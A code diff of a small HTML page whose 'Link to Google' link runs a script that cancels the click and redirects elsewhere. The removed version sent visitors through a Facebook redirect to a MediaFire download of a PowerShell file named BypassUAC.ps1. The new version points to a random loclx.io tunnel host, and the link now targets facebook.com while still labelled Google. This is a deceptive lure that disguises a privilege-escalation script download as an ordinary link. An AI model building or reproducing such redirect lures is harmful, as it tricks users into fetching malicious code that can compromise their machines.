--- a/index.html
+++ b/index.html
@@ -7,12 +7,12 @@
 </head>
 <body>
     <center><h1>Click on link to Redirect:</h1>
-    <a href="https://google.com" id="redirectLink">Link to Google</a></center>
+    <a href="https://facebook.com" id="redirectLink">Link to Google</a></center>
 
     <script>
         document.getElementById("redirectLink").addEventListener("click", function(event) {
             event.preventDefault();
-            window.location.href = "https://l.facebook.com/l.php?u=https://download1648.mediafire.com/4882tmhs2b8gmOIQGqr-lp1i49eN78LmcBQbaPTeUcHoeQD5NMEejdeu-udPCWn3ieD8kJgMYRLwUoNredhNtBPovbECpCpjavNmw0lCqVpFabYfLhJ2uyc4QTAJLpXj3JBaghD3zVTAgH81ZrlpgcR9Bc2x6YxSTTGNwuwiDjznpQ/byk90qeuc0c8auj/BypassUAC.ps1&h=AT2lJ_ex1mpz8Z0hGxM6hGXvG20JbXwTmeTpJl72_lAB5VnEOL81vUzqAcVH6Z8lZM4OWqHn4MKU-pdKJLPwS3jBi0KjBcIPvQlXfI67qFh3Pl0eoyfnqcbRm6YCrc2FIaPdgU67pN_Cxw"; 
+            window.location.href = "https://ygvvjgywoz.loclx.io"; 
         });
     </script>
 </body>
